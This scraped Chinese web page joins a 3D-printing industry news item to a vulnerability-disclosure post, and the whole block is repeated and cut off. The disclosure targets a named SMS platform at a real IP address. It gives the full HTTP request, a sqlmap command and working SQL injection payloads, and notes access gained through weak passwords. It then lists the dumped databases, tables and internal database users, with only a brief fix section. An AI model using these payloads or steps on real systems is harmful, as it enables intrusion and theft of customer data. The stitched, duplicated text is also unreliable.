white产农产品电商平台排名台
点击联系发帖人
时间:2016-07-16 09:35
洛阳白马集团有限责任公司当前位置: >
> WhiteClouds成世界最大全彩3D打印服务供应商
WhiteClouds成世界最大全彩3D打印服务供应商
10:02:45 来源:互联网 |
近日,WhiteClouds公司宣布其生产面积将扩展至6万平方英尺,并且将从3D Systems公司再采购14台全彩3D打印机以扩大其3D打印能力。这意味着,目前WhiteClouds已经拥有从3D Systems公司采购的24台全彩3D打印机,其中包括 ProJet 660Pros、ProJet 4500s和ProJet 860Pro,这使得它成为世界上最大的全彩色3D打印服务提供商,以及最大的基于粘合剂喷射技术的3D打印工厂。由Jerry Ropelato创立的WhiteClouds公司一跃成为世界最大的全彩3D打印服务供应商,以及3D Systems在美国的分销商之一。据了解,Jerry Ropelato曾经创立和领导过互联网上多家顶尖的科技媒体网站,比如和Tom&s Hardware等。
&我们新的工厂是为世界级制造而设计的。&Ropelato说。&它的选址具有战略方面的考虑,我们的工厂布局有利于精益制造原则和高质量的生产。这次扩张将公司的全彩3D打印能力扩展了一倍。这一切清楚地表明,3D打印技术并非昙花一现,它正继续以惊人的速度在B2B、B2C和P2P领域成长。& &WhiteClouds的3D打印服务能力的扩展及其在全彩色打印领域的经验积累,使它们能够为那些寻求将自己的创业变成彩色现实的客户提供卓越的服务和产品。&3D Systems公司首席收益官Charlie Grace补充说:&我们很高兴他们选择了我们的ColorJet打印技术以扩展其全彩生产服务,并期待着他们继续成长。&
WhiteClouds将保持前进,并将注意力集中于B2B业务销售和战略伙伴关系的开发他。该公司将继续深耕其专注的四个主要行业:建筑、医疗、原型和娱乐。除了其全彩3D打印服务,该公司还提供基于各种材料的原型和最终零部件制造服务。
为了支持其增长和生产能力的扩大,WhiteClouds还扩展了其管理团队。新任首席运营官Joey Skinner将监督生产和开发流程使公司尽可能高效运营。而Braden Ellis则被任命为该公司的新任CRO,以负责管理伙伴关系和战略联盟,以创造未来的增长和更多的收入。
关注“中国电力电子产业网”陪你一起成长& 添加方式:1、扫描左侧二维码2、添加朋友,搜微信号:pedianlidianzi
有事先发邮件,我会及时与您联系,谢谢合作。&&&网站电子邮箱::
最新展会信息
| | | | | | | |
广告合作∶010-&&Email∶&&&展会联系∶&&&电力电子技术群:&&&Copyright2011&&http://www.p- /&All&Rights&Reserved&&&&电力电子技术千人大群1群:&(未满)&&电力电子技术千人大群2 群:&&
&&版权所有∶中国电力电子产业网(www.p-)&经营许可证编号∶&京ICP备号-1&&京公网安备&41&号&&&
网站服务|广告服务|文章投稿|友情链接QQ:&分享漏洞:
披露状态:
: 积极联系厂商并且等待厂商认领中,细节不对外公开
: 厂商已经主动忽略漏洞,细节向公众公开
简要描述:
某短信平台SQL注入,数万各行各业用户(银行、证券、保险、医药、酒店、互联网等企业)数据泄露
详细说明:
http://211.147.239.62/
#### 下面存为header
POST http://211.147.239.62/Statistics/SumStatistics/GetSumDepartment?startTime=&endTime=&mstype=SMS&onTime=true HTTP/1.1
Host: 211.147.239.62
Connection: keep-alive
Content-Length: 76
Pragma: no-cache
Cache-Control: no-cache
Accept: application/json, text/javascript, */*; q=0.01
Origin: http://211.147.239.62
X-Requested-With: XMLHttpRequest
Referer: http://211.147.239.62/Statistics/SumStatistics/Index
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,q=0.8,q=0.6
Cookie: 替换为登陆后的COOKIE
MenusBlockIDs=,,,,,; ControllerName=SumStatistics
startTime=&endTime=&mstype=SMS&onTime=true
./sqlmap.py -r header --threads 10 --dbs -batch
由之前扫到的弱口令,登陆进来后找到以下注入点:
Place: POST
Parameter: startTime
Type: boolean-based blind
Title: OR boolean-based blind - WHERE or HAVING clause (MySQL comment)
Payload: startTime=-; OR ()#&endTime=&mstype=SMS&on
Type: error-based
Title: MySQL &= 5.0 AND error-based - WHERE or HAVING clause
Payload: startTime=' AND (SELECT 6733 FROM(SELECT COUNT(*),CONCA
T(0x716c6f6371,(SELECT (CASE WHEN () THEN 1 ELSE 0 END)),0x716f697771
,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND '
kjoG'='kjoG&endTime=&mstype=SMS&onTime=true
Type: AND/OR time-based blind
Title: MySQL & 5.0.11 AND time-based blind
Payload: startTime=' AND SLEEP(5) AND 'JYnp'='JYnp&endTime=2015-
01-25&mstype=SMS&onTime=true
漏洞证明:
#### DATABASES(16)
[*] 400_gsms
[*] 400_list
[*] commission
[*] gsms2_init
[*] gsms_init
[*] information_schema
[*] list2_init
[*] list_init
[*] mos2_gsms
[*] mos_gsms
[*] mos_gsms2_1
[*] mos_gsms_2
[*] mos_list2_1
[*] performance_schema
Database: mos_gsms2_1
+-------------------------------+---------+
| Entries |
+-------------------------------+---------+
| gsms_msg_ticket
| 4302497 |
| gsms_contact
| 4191441 |
| gsms_statereport
| 4031478 |
| gsms_deduct_record
| gsms_user_role
| gsms_user_role
| gsms_user_role
| gsms_msg_frame
| gsms_msg_pack
| gsms_non_white_list
| gsms_red_list
| gsms_account_carrier_price
| gsms_user
| gsms_user
| gsms_user
| gsms_user
| gsms_biztype_specnum
| gsms_enterprise_apply_detail
| gsms_user_business_type
| gsms_enterprise_specnum_bind
| gsms_user_account_bind
| gsms_business_type
| gsms_capital_account
| gsms_enterprise_apply
| gsms_user_ext
| gsms_capital_account
| chenxuan_saleman_count
| chenxuan_enterprise_count
| gsms_moticket
| gsms_channel_result_report
| gsms_user_operation_history
| gsms_channel_send_report
| gsms_specsvs_num
| gsms_realtime_send_statistic
| gsms_role_permission
| gsms_contact_group
| gsms_channel_carrier_map
| gsms_carrier_channel
| gsms_permission_depends
| chenxuan_carrier_type
| cx_sales_count
| gsms_permission
| gsms_carrier_teleseg_map
| gsms_region_code
| gsms_white_redirect
| chenxuan
| gsms_sys_config
| mos_user
| gsms_charge_record
| mos_user
| gsms_role
| gsms_deduct_report
| gsms_role
| chenxuan
| gsms_workflow_process_record
| gsms_enterprise_change_record | 52
| gsms_phrase
| gsms_fetch_point
| chenxuan33333
| gsms_region_carrier
| gsms_industry
| gsms_channel_change_detail
| gsms_channel_change
| gsms_charge_payment_map
| gsms_payment_record
| gsms_param
| gsms_enterprise_access_record | 5
| gsms_sync_version
| gsms_carrier
| gsms_mms_material_group
| gsms_msg_type
| gsms_specnum_region_priority
| gsms_mms_material
| gsms_monthly_ticket_amount
| gsms_priority_map
+-------------------------------+---------+
#### Database: commission [22 tables]
+-----------------------------+
| channel_all_400
| channel_all_mos
| channel_sw
| channel_type_3_400
| channel_type_3_mos
| date_count_400
| date_count_mos
| date_count_mos_copy
| date_count_other
| enterprise_blance_400
| enterprise_blance_mos
| enterprise_new_400
| enterprise_new_mos
| gift_record_400
| gift_record_mos
| not_reconciled_record_400
| not_reconciled_record_40011 |
| not_reconciled_record_mos
| not_reconciled_record_mos11 |
+-----------------------------+
#### Database: 400_list
[9 tables]
+-------------------------+
| gsms_black_phone_list
| gsms_cache_key_word
| gsms_cache_phone_list
| gsms_carrier
| gsms_region_carrier_map |
| gsms_region_code
| gsms_sync_effect_time
| gsms_sync_version
| gsms_white_phone_list
+-------------------------+
#### Database: mos2_gsms
[148 tables]
+----------------------------------------+
| chenxuan_carrier_price
| chenxuan_carrier_speed
| chenxuan_carrier_type
| chenxuan_chanage_userstate
| chenxuan_quite_customer
| chenxuan_red_list_1222
| gsms_account_carrier_price
| gsms_account_carrier_price
| gsms_adapter
| gsms_alarm_enterprise
| gsms_announcement
| gsms_audit_record
| gsms_biz_app_template
| gsms_biz_app_template_detail
| gsms_biz_application
| gsms_biztype_specnum
| gsms_biztype_specnum
| gsms_business_type
| gsms_capital_account
| gsms_capital_account0101
| gsms_capital_account
| gsms_capital_account
| gsms_capital_account
| gsms_capital_account
| gsms_capital_account
| gsms_carrier
| gsms_carrier_channel
| gsms_carrier_channel
| gsms_carrier_channel
| gsms_carrier_channel
| gsms_carrier_channel
| gsms_carrier_teleseg_map
| gsms_channel_carrier_map
| gsms_channel_carrier_map
| gsms_channel_change
| gsms_channel_change_detail
| gsms_channel_region_map
| gsms_channel_result_report
| gsms_channel_send_report
| gsms_charge_payment_map
| gsms_charge_record
| gsms_contact
| gsms_contact_group
| gsms_customer_group
| gsms_customer_user
| gsms_deduct_record
| gsms_deduct_report
| gsms_enterprise_access_record
| gsms_enterprise_apply
| gsms_enterprise_apply_detail
| gsms_enterprise_apply_detail
| gsms_enterprise_apply_detail
| gsms_enterprise_apply_detail
| gsms_enterprise_apply_detail
| gsms_enterprise_apply_detail
| gsms_enterprise_apply_detail
| gsms_enterprise_apply_detail |
| gsms_enterprise_change_record
| gsms_enterprise_specnum_bind
| gsms_enterprise_specnum_bind
| gsms_enterprise_specnum_bind
| gsms_enterprise_specnum_bind
| gsms_enterprise_specnum_bind
| gsms_enterprise_specnum_bind
| gsms_enterprise_specnum_bind
| gsms_enterprise_specnum_bind |
| gsms_faq
| gsms_fetch_confirm
| gsms_fetch_point
| gsms_file_handle_task
| gsms_industry
| gsms_knowledge
| gsms_knowledge_display_channel
| gsms_knowledge_group
| gsms_message_record
| gsms_message_statistics
| gsms_mms_material
| gsms_mms_material_group
| gsms_monthly_ticket_amount
| gsms_moreply
| gsms_moticket
| gsms_moticket_channel_msgid
| gsms_msg_frame
| gsms_msg_pack
| gsms_msg_pack_revise
| gsms_msg_ticket
| gsms_msg_type
| gsms_non_white_list
| gsms_non_whitelist_export_recored
| gsms_online
| gsms_param
| gsms_payment_record
| gsms_payment_record
| gsms_payment_record
| gsms_permission
| gsms_permission_depends
| gsms_phrase
| gsms_priority_map
| gsms_realtime_send_statistic
| gsms_red_list
| gsms_region_carrier
| gsms_region_carrier
| gsms_region_code
| gsms_region_map
| gsms_role
| gsms_role_permission
| gsms_role_permission
| gsms_service_statistics
| gsms_specnum_region_priority
| gsms_specsvs_num
| gsms_statereport
| gsms_statereport_map
| gsms_survey_template
| gsms_survey_template_option
| gsms_sync_version
| gsms_sys_alarm
| gsms_sys_config
| gsms_sys_config
| gsms_template_group
| gsms_template_recored
| gsms_user
| gsms_user
| gsms_user
| gsms_user
| gsms_user
| gsms_user_
| gsms_user_
| gsms_user_
| gsms_user_
| gsms_user_account_bind
| gsms_user_account_bind
| gsms_user_audit
| gsms_user_business_type
| gsms_user_ext
| gsms_user_ext_bak_err
| gsms_user_msg_type
| gsms_user_operation_history
| gsms_user_role
| gsms_verify
| gsms_virtual_channel_map
| gsms_white_redirect
| gsms_workflow_process_record
| info_delete
| insert_static_gsms_msg_frame
| insert_static_gsms_msg_ticket
| insert_static_gsms_statereport
| mos_user
+----------------------------------------+
#### Database: mos_gsms[90 tables]
+-----------------------------------+
| chenxuan_carrier_type
| chenxuan_charge_record
| gsms_account_carrier_price
| gsms_biztype_specnum
| gsms_biztype_specnum
| gsms_biztype_specnum
| gsms_business_type
| gsms_capital_account
| gsms_capital_account1206
| gsms_capital_account
| gsms_capital_account
| gsms_carrier
| gsms_carrier_channel
| gsms_carrier_channel0830
| gsms_carrier_channel
| gsms_carrier_channel_copy
| gsms_carrier_teleseg_map
| gsms_channel_carrier_map
| gsms_channel_change
| gsms_channel_change_detail
| gsms_channel_region_map
| gsms_channel_result_report
| gsms_channel_result_report0629
| gsms_channel_send_report
| gsms_channel_send_report0629
| gsms_charge_payment_map
| gsms_charge_record
| gsms_charge_record0816
| gsms_charge_record0906
| gsms_charge_record1010
| gsms_charge_record
| gsms_contact
| gsms_contact_group
| gsms_deduct_record
| gsms_enterprise_specnum_bind
| gsms_enterprise_specnum_bind0815
| gsms_fetch_point
| gsms_fetch_point0904
| gsms_file_handle_task
| gsms_monthly_ticket_amount
| gsms_moticket
| gsms_moticket_channel_msgid
| gsms_msg_frame
| gsms_msg_pack
| gsms_msg_ticket
| gsms_msg_type
| gsms_non_white_list
| gsms_non_whitelist_export_recored |
| gsms_param
| gsms_payment_record
| gsms_permission
| gsms_permission_depends
| gsms_priority_map
| gsms_realtime_send_statistic
| gsms_red_list
| gsms_red_list0906
| gsms_region_carrier
| gsms_region_code
| gsms_region_map
| gsms_role
| gsms_role_permission
| gsms_specnum_region_priority
| gsms_specsvs_num
| gsms_specsvs_num0831
| gsms_statereport
| gsms_sync_version
| gsms_sys_config
| gsms_user
| gsms_user
| gsms_user
| gsms_user
| gsms_user_account_bind
| gsms_user_business_type
| gsms_user_business_type
| gsms_user_business_type
| gsms_user_ext
| gsms_user_msg_type
| gsms_user_operation_history
| gsms_user_role
| gsms_verify
| gsms_virtual_channel_map
| gsms_white_redirect
| gsms_white_redirect0813
| gsms_white_redirect
| mos_user
| mos_user
| mos_user
| mos_user
| mos_user
+-----------------------------------+
#### Users(56)
[*] 'cactiuser'@'192.168.10.89'
[*] 'censerver'@'192.168.10.89'
[*] 'censerver'@'localhost'
[*] 'chengxuan'@'192.168.%'
[*] 'chengxuan'@'localhost'
[*] 'innotop'@'192.168.10.83'
[*] 'monitor'@'192.168.10.89'
[*] 'monyog'@'192.168.%'
[*] 'monyog'@'localhost'
[*] 'moshengkuo'@'192.168.%'
[*] 'mscheck'@'127.0.0.1'
[*] 'mscheck'@'192.168.%'
[*] 'mscheck'@'localhost'
[*] 'private'@'192.168.10.86'
[*] 'private'@'localhost'
[*] 'program'@'172.16.200.10'
[*] 'program'@'172.16.202.101'
[*] 'program'@'172.16.202.102'
[*] 'program'@'172.16.202.203'
[*] 'program'@'183.232.65.44'
[*] 'program'@'192.168.%'
[*] 'program'@'192.168.10.100'
[*] 'program'@'192.168.10.101'
[*] 'program'@'192.168.10.102'
[*] 'program'@'192.168.10.103'
[*] 'program'@'192.168.10.104'
[*] 'program'@'192.168.10.120'
[*] 'program'@'192.168.10.150'
[*] 'program'@'192.168.10.151'
[*] 'program'@'192.168.10.188'
[*] 'program'@'192.168.10.223'
[*] 'program'@'192.168.10.68'
[*] 'program'@'192.168.10.81'
[*] 'program'@'192.168.10.84'
[*] 'program'@'192.168.10.86'
[*] 'program'@'192.168.10.87'
[*] 'program'@'192.168.10.88'
[*] 'program'@'192.168.10.92'
[*] 'program'@'192.168.10.93'
[*] 'program'@'192.168.10.96'
[*] 'program'@'192.168.10.97'
[*] 'program'@'192.168.10.98'
[*] 'program'@'localhost'
[*] 'repl'@'192.168.10.%'
[*] 'repl'@'192.168.10.130'
[*] 'root'@'%'
[*] 'root'@'192.168.%'
[*] 'root'@'localhost'
[*] 'super'@'192.168.%'
[*] 'super'@'192.168.10.86'
[*] 'super'@'localhost'
[*] 'wanglianguang'@'%'
[*] 'wanglianguang'@'192.168.%'
[*] 'wanglianguang'@'localhost'
[*] 'xiaozhuan'@'192.168.%'
[*] 'xiaozhuan'@'localhost'
从结果看应该所有产品数据库都在,光短信库用户就有50000多家,短信数量千万级。还有400等产品
涉及厂商(短信发送数较多的):【**银行】【东风悦达起亚】【安利中国】【BMW中国】【人人快递网】【中通物流】【我要旅行网】【娃哈哈集团】【GXG】【唯品会】【酷讯】等等
修复方案:
- 找到类似场景可能出现的地方进行排查后对参数进行过滤
- 增加验证码难度以及加上次数限制
版权声明:转载请注明来源 @
厂商回应:
未能联系到厂商或者厂商积极拒绝
漏洞评价:
对本漏洞信息进行评价,以更好的反馈信息的价值,包括信息客观性,内容是否完整以及是否具备学习价值
漏洞评价(共0人评价):
登陆后才能进行评分
登录后才能发表评论,请先}
> WhiteClouds成世界最大全彩3D打印服务供应商
WhiteClouds成世界最大全彩3D打印服务供应商
10:02:45 来源:互联网 |
近日,WhiteClouds公司宣布其生产面积将扩展至6万平方英尺,并且将从3D Systems公司再采购14台全彩3D打印机以扩大其3D打印能力。这意味着,目前WhiteClouds已经拥有从3D Systems公司采购的24台全彩3D打印机,其中包括 ProJet 660Pros、ProJet 4500s和ProJet 860Pro,这使得它成为世界上最大的全彩色3D打印服务提供商,以及最大的基于粘合剂喷射技术的3D打印工厂。由Jerry Ropelato创立的WhiteClouds公司一跃成为世界最大的全彩3D打印服务供应商,以及3D Systems在美国的分销商之一。据了解,Jerry Ropelato曾经创立和领导过互联网上多家顶尖的科技媒体网站,比如和Tom&s Hardware等。
&我们新的工厂是为世界级制造而设计的。&Ropelato说。&它的选址具有战略方面的考虑,我们的工厂布局有利于精益制造原则和高质量的生产。这次扩张将公司的全彩3D打印能力扩展了一倍。这一切清楚地表明,3D打印技术并非昙花一现,它正继续以惊人的速度在B2B、B2C和P2P领域成长。& &WhiteClouds的3D打印服务能力的扩展及其在全彩色打印领域的经验积累,使它们能够为那些寻求将自己的创业变成彩色现实的客户提供卓越的服务和产品。&3D Systems公司首席收益官Charlie Grace补充说:&我们很高兴他们选择了我们的ColorJet打印技术以扩展其全彩生产服务,并期待着他们继续成长。&
WhiteClouds将保持前进,并将注意力集中于B2B业务销售和战略伙伴关系的开发他。该公司将继续深耕其专注的四个主要行业:建筑、医疗、原型和娱乐。除了其全彩3D打印服务,该公司还提供基于各种材料的原型和最终零部件制造服务。
为了支持其增长和生产能力的扩大,WhiteClouds还扩展了其管理团队。新任首席运营官Joey Skinner将监督生产和开发流程使公司尽可能高效运营。而Braden Ellis则被任命为该公司的新任CRO,以负责管理伙伴关系和战略联盟,以创造未来的增长和更多的收入。
关注“中国电力电子产业网”陪你一起成长& 添加方式:1、扫描左侧二维码2、添加朋友,搜微信号:pedianlidianzi
有事先发邮件,我会及时与您联系,谢谢合作。&&&网站电子邮箱::
最新展会信息
| | | | | | | |
广告合作∶010-&&Email∶&&&展会联系∶&&&电力电子技术群:&&&Copyright2011&&http://www.p- /&All&Rights&Reserved&&&&电力电子技术千人大群1群:&(未满)&&电力电子技术千人大群2 群:&&
&&版权所有∶中国电力电子产业网(www.p-)&经营许可证编号∶&京ICP备号-1&&京公网安备&41&号&&&
网站服务|广告服务|文章投稿|友情链接QQ:&分享漏洞:
披露状态:
: 积极联系厂商并且等待厂商认领中,细节不对外公开
: 厂商已经主动忽略漏洞,细节向公众公开
简要描述:
某短信平台SQL注入,数万各行各业用户(银行、证券、保险、医药、酒店、互联网等企业)数据泄露
详细说明:
http://211.147.239.62/
#### 下面存为header
POST http://211.147.239.62/Statistics/SumStatistics/GetSumDepartment?startTime=&endTime=&mstype=SMS&onTime=true HTTP/1.1
Host: 211.147.239.62
Connection: keep-alive
Content-Length: 76
Pragma: no-cache
Cache-Control: no-cache
Accept: application/json, text/javascript, */*; q=0.01
Origin: http://211.147.239.62
X-Requested-With: XMLHttpRequest
Referer: http://211.147.239.62/Statistics/SumStatistics/Index
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,q=0.8,q=0.6
Cookie: 替换为登陆后的COOKIE
MenusBlockIDs=,,,,,; ControllerName=SumStatistics
startTime=&endTime=&mstype=SMS&onTime=true
./sqlmap.py -r header --threads 10 --dbs -batch
由之前扫到的弱口令,登陆进来后找到以下注入点:
Place: POST
Parameter: startTime
Type: boolean-based blind
Title: OR boolean-based blind - WHERE or HAVING clause (MySQL comment)
Payload: startTime=-; OR ()#&endTime=&mstype=SMS&on
Type: error-based
Title: MySQL &= 5.0 AND error-based - WHERE or HAVING clause
Payload: startTime=' AND (SELECT 6733 FROM(SELECT COUNT(*),CONCA
T(0x716c6f6371,(SELECT (CASE WHEN () THEN 1 ELSE 0 END)),0x716f697771
,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND '
kjoG'='kjoG&endTime=&mstype=SMS&onTime=true
Type: AND/OR time-based blind
Title: MySQL & 5.0.11 AND time-based blind
Payload: startTime=' AND SLEEP(5) AND 'JYnp'='JYnp&endTime=2015-
01-25&mstype=SMS&onTime=true
漏洞证明:
#### DATABASES(16)
[*] 400_gsms
[*] 400_list
[*] commission
[*] gsms2_init
[*] gsms_init
[*] information_schema
[*] list2_init
[*] list_init
[*] mos2_gsms
[*] mos_gsms
[*] mos_gsms2_1
[*] mos_gsms_2
[*] mos_list2_1
[*] performance_schema
Database: mos_gsms2_1
+-------------------------------+---------+
| Entries |
+-------------------------------+---------+
| gsms_msg_ticket
| 4302497 |
| gsms_contact
| 4191441 |
| gsms_statereport
| 4031478 |
| gsms_deduct_record
| gsms_user_role
| gsms_user_role
| gsms_user_role
| gsms_msg_frame
| gsms_msg_pack
| gsms_non_white_list
| gsms_red_list
| gsms_account_carrier_price
| gsms_user
| gsms_user
| gsms_user
| gsms_user
| gsms_biztype_specnum
| gsms_enterprise_apply_detail
| gsms_user_business_type
| gsms_enterprise_specnum_bind
| gsms_user_account_bind
| gsms_business_type
| gsms_capital_account
| gsms_enterprise_apply
| gsms_user_ext
| gsms_capital_account
| chenxuan_saleman_count
| chenxuan_enterprise_count
| gsms_moticket
| gsms_channel_result_report
| gsms_user_operation_history
| gsms_channel_send_report
| gsms_specsvs_num
| gsms_realtime_send_statistic
| gsms_role_permission
| gsms_contact_group
| gsms_channel_carrier_map
| gsms_carrier_channel
| gsms_permission_depends
| chenxuan_carrier_type
| cx_sales_count
| gsms_permission
| gsms_carrier_teleseg_map
| gsms_region_code
| gsms_white_redirect
| chenxuan
| gsms_sys_config
| mos_user
| gsms_charge_record
| mos_user
| gsms_role
| gsms_deduct_report
| gsms_role
| chenxuan
| gsms_workflow_process_record
| gsms_enterprise_change_record | 52
| gsms_phrase
| gsms_fetch_point
| chenxuan33333
| gsms_region_carrier
| gsms_industry
| gsms_channel_change_detail
| gsms_channel_change
| gsms_charge_payment_map
| gsms_payment_record
| gsms_param
| gsms_enterprise_access_record | 5
| gsms_sync_version
| gsms_carrier
| gsms_mms_material_group
| gsms_msg_type
| gsms_specnum_region_priority
| gsms_mms_material
| gsms_monthly_ticket_amount
| gsms_priority_map
+-------------------------------+---------+
#### Database: commission [22 tables]
+-----------------------------+
| channel_all_400
| channel_all_mos
| channel_sw
| channel_type_3_400
| channel_type_3_mos
| date_count_400
| date_count_mos
| date_count_mos_copy
| date_count_other
| enterprise_blance_400
| enterprise_blance_mos
| enterprise_new_400
| enterprise_new_mos
| gift_record_400
| gift_record_mos
| not_reconciled_record_400
| not_reconciled_record_40011 |
| not_reconciled_record_mos
| not_reconciled_record_mos11 |
+-----------------------------+
#### Database: 400_list
[9 tables]
+-------------------------+
| gsms_black_phone_list
| gsms_cache_key_word
| gsms_cache_phone_list
| gsms_carrier
| gsms_region_carrier_map |
| gsms_region_code
| gsms_sync_effect_time
| gsms_sync_version
| gsms_white_phone_list
+-------------------------+
#### Database: mos2_gsms
[148 tables]
+----------------------------------------+
| chenxuan_carrier_price
| chenxuan_carrier_speed
| chenxuan_carrier_type
| chenxuan_chanage_userstate
| chenxuan_quite_customer
| chenxuan_red_list_1222
| gsms_account_carrier_price
| gsms_account_carrier_price
| gsms_adapter
| gsms_alarm_enterprise
| gsms_announcement
| gsms_audit_record
| gsms_biz_app_template
| gsms_biz_app_template_detail
| gsms_biz_application
| gsms_biztype_specnum
| gsms_biztype_specnum
| gsms_business_type
| gsms_capital_account
| gsms_capital_account0101
| gsms_capital_account
| gsms_capital_account
| gsms_capital_account
| gsms_capital_account
| gsms_capital_account
| gsms_carrier
| gsms_carrier_channel
| gsms_carrier_channel
| gsms_carrier_channel
| gsms_carrier_channel
| gsms_carrier_channel
| gsms_carrier_teleseg_map
| gsms_channel_carrier_map
| gsms_channel_carrier_map
| gsms_channel_change
| gsms_channel_change_detail
| gsms_channel_region_map
| gsms_channel_result_report
| gsms_channel_send_report
| gsms_charge_payment_map
| gsms_charge_record
| gsms_contact
| gsms_contact_group
| gsms_customer_group
| gsms_customer_user
| gsms_deduct_record
| gsms_deduct_report
| gsms_enterprise_access_record
| gsms_enterprise_apply
| gsms_enterprise_apply_detail
| gsms_enterprise_apply_detail
| gsms_enterprise_apply_detail
| gsms_enterprise_apply_detail
| gsms_enterprise_apply_detail
| gsms_enterprise_apply_detail
| gsms_enterprise_apply_detail
| gsms_enterprise_apply_detail |
| gsms_enterprise_change_record
| gsms_enterprise_specnum_bind
| gsms_enterprise_specnum_bind
| gsms_enterprise_specnum_bind
| gsms_enterprise_specnum_bind
| gsms_enterprise_specnum_bind
| gsms_enterprise_specnum_bind
| gsms_enterprise_specnum_bind
| gsms_enterprise_specnum_bind |
| gsms_faq
| gsms_fetch_confirm
| gsms_fetch_point
| gsms_file_handle_task
| gsms_industry
| gsms_knowledge
| gsms_knowledge_display_channel
| gsms_knowledge_group
| gsms_message_record
| gsms_message_statistics
| gsms_mms_material
| gsms_mms_material_group
| gsms_monthly_ticket_amount
| gsms_moreply
| gsms_moticket
| gsms_moticket_channel_msgid
| gsms_msg_frame
| gsms_msg_pack
| gsms_msg_pack_revise
| gsms_msg_ticket
| gsms_msg_type
| gsms_non_white_list
| gsms_non_whitelist_export_recored
| gsms_online
| gsms_param
| gsms_payment_record
| gsms_payment_record
| gsms_payment_record
| gsms_permission
| gsms_permission_depends
| gsms_phrase
| gsms_priority_map
| gsms_realtime_send_statistic
| gsms_red_list
| gsms_region_carrier
| gsms_region_carrier
| gsms_region_code
| gsms_region_map
| gsms_role
| gsms_role_permission
| gsms_role_permission
| gsms_service_statistics
| gsms_specnum_region_priority
| gsms_specsvs_num
| gsms_statereport
| gsms_statereport_map
| gsms_survey_template
| gsms_survey_template_option
| gsms_sync_version
| gsms_sys_alarm
| gsms_sys_config
| gsms_sys_config
| gsms_template_group
| gsms_template_recored
| gsms_user
| gsms_user
| gsms_user
| gsms_user
| gsms_user
| gsms_user_
| gsms_user_
| gsms_user_
| gsms_user_
| gsms_user_account_bind
| gsms_user_account_bind
| gsms_user_audit
| gsms_user_business_type
| gsms_user_ext
| gsms_user_ext_bak_err
| gsms_user_msg_type
| gsms_user_operation_history
| gsms_user_role
| gsms_verify
| gsms_virtual_channel_map
| gsms_white_redirect
| gsms_workflow_process_record
| info_delete
| insert_static_gsms_msg_frame
| insert_static_gsms_msg_ticket
| insert_static_gsms_statereport
| mos_user
+----------------------------------------+
#### Database: mos_gsms[90 tables]
+-----------------------------------+
| chenxuan_carrier_type
| chenxuan_charge_record
| gsms_account_carrier_price
| gsms_biztype_specnum
| gsms_biztype_specnum
| gsms_biztype_specnum
| gsms_business_type
| gsms_capital_account
| gsms_capital_account1206
| gsms_capital_account
| gsms_capital_account
| gsms_carrier
| gsms_carrier_channel
| gsms_carrier_channel0830
| gsms_carrier_channel
| gsms_carrier_channel_copy
| gsms_carrier_teleseg_map
| gsms_channel_carrier_map
| gsms_channel_change
| gsms_channel_change_detail
| gsms_channel_region_map
| gsms_channel_result_report
| gsms_channel_result_report0629
| gsms_channel_send_report
| gsms_channel_send_report0629
| gsms_charge_payment_map
| gsms_charge_record
| gsms_charge_record0816
| gsms_charge_record0906
| gsms_charge_record1010
| gsms_charge_record
| gsms_contact
| gsms_contact_group
| gsms_deduct_record
| gsms_enterprise_specnum_bind
| gsms_enterprise_specnum_bind0815
| gsms_fetch_point
| gsms_fetch_point0904
| gsms_file_handle_task
| gsms_monthly_ticket_amount
| gsms_moticket
| gsms_moticket_channel_msgid
| gsms_msg_frame
| gsms_msg_pack
| gsms_msg_ticket
| gsms_msg_type
| gsms_non_white_list
| gsms_non_whitelist_export_recored |
| gsms_param
| gsms_payment_record
| gsms_permission
| gsms_permission_depends
| gsms_priority_map
| gsms_realtime_send_statistic
| gsms_red_list
| gsms_red_list0906
| gsms_region_carrier
| gsms_region_code
| gsms_region_map
| gsms_role
| gsms_role_permission
| gsms_specnum_region_priority
| gsms_specsvs_num
| gsms_specsvs_num0831
| gsms_statereport
| gsms_sync_version
| gsms_sys_config
| gsms_user
| gsms_user
| gsms_user
| gsms_user
| gsms_user_account_bind
| gsms_user_business_type
| gsms_user_business_type
| gsms_user_business_type
| gsms_user_ext
| gsms_user_msg_type
| gsms_user_operation_history
| gsms_user_role
| gsms_verify
| gsms_virtual_channel_map
| gsms_white_redirect
| gsms_white_redirect0813
| gsms_white_redirect
| mos_user
| mos_user
| mos_user
| mos_user
| mos_user
+-----------------------------------+
#### Users(56)
[*] 'cactiuser'@'192.168.10.89'
[*] 'censerver'@'192.168.10.89'
[*] 'censerver'@'localhost'
[*] 'chengxuan'@'192.168.%'
[*] 'chengxuan'@'localhost'
[*] 'innotop'@'192.168.10.83'
[*] 'monitor'@'192.168.10.89'
[*] 'monyog'@'192.168.%'
[*] 'monyog'@'localhost'
[*] 'moshengkuo'@'192.168.%'
[*] 'mscheck'@'127.0.0.1'
[*] 'mscheck'@'192.168.%'
[*] 'mscheck'@'localhost'
[*] 'private'@'192.168.10.86'
[*] 'private'@'localhost'
[*] 'program'@'172.16.200.10'
[*] 'program'@'172.16.202.101'
[*] 'program'@'172.16.202.102'
[*] 'program'@'172.16.202.203'
[*] 'program'@'183.232.65.44'
[*] 'program'@'192.168.%'
[*] 'program'@'192.168.10.100'
[*] 'program'@'192.168.10.101'
[*] 'program'@'192.168.10.102'
[*] 'program'@'192.168.10.103'
[*] 'program'@'192.168.10.104'
[*] 'program'@'192.168.10.120'
[*] 'program'@'192.168.10.150'
[*] 'program'@'192.168.10.151'
[*] 'program'@'192.168.10.188'
[*] 'program'@'192.168.10.223'
[*] 'program'@'192.168.10.68'
[*] 'program'@'192.168.10.81'
[*] 'program'@'192.168.10.84'
[*] 'program'@'192.168.10.86'
[*] 'program'@'192.168.10.87'
[*] 'program'@'192.168.10.88'
[*] 'program'@'192.168.10.92'
[*] 'program'@'192.168.10.93'
[*] 'program'@'192.168.10.96'
[*] 'program'@'192.168.10.97'
[*] 'program'@'192.168.10.98'
[*] 'program'@'localhost'
[*] 'repl'@'192.168.10.%'
[*] 'repl'@'192.168.10.130'
[*] 'root'@'%'
[*] 'root'@'192.168.%'
[*] 'root'@'localhost'
[*] 'super'@'192.168.%'
[*] 'super'@'192.168.10.86'
[*] 'super'@'localhost'
[*] 'wanglianguang'@'%'
[*] 'wanglianguang'@'192.168.%'
